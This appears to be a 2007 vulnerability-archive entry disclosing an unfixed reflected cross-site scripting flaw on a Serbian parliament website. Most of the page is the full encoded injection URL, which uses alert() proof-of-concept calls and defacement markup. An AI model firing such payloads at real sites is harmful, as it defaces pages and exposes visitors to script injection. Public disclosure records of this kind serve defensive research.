Advertisements:
Security researcher kaksii, has submitted on 24/10/2007 a cross-site-scripting (XSS) vulnerability affecting www.parlament.sr.gov.yu, which at the time of submission ranked 4957 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 24/10/2007 Date published: 27/10/2007 Fixed? Mail us!Status:  UNFIXED
Author: kaksii Domain: www.parlament.sr.gov.yu Category: XSS Pagerank: 4957
URL: http://www.parlament.sr.gov.yu/content/cir/sastav/poslanici_pretraga.asp?sortOrder=&ime=%22%3E%3Cscr
ipt%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscr
ipt%3Ealert%28%27kaksii_was_here%27%29%3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscr
ipt%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctext
area%2520name%3D1%2520cols%3D100000%2520rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftexta
rea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&prezime=%22%3E%3Cscript%3Ealert%281%29%
3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27ka
ksii_was_here%27%29%3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111
%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2
520cols%3D100000%2520rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E
%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&grupa=0&stranka=0&mesto=%22%3E%3Cscript%3Ealert%281%29%3C%
2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksi
i_was_here%27%29%3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29
%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520
cols%3D100000%2520rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C
%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&zanimanje=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2F
textarea%3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%
3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3
Cdiv%2520align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%252
0rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscr
ipt%3E%3Cplaintext%3E&Submit=%CF%F0%EE%ED%E0%90%E8
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.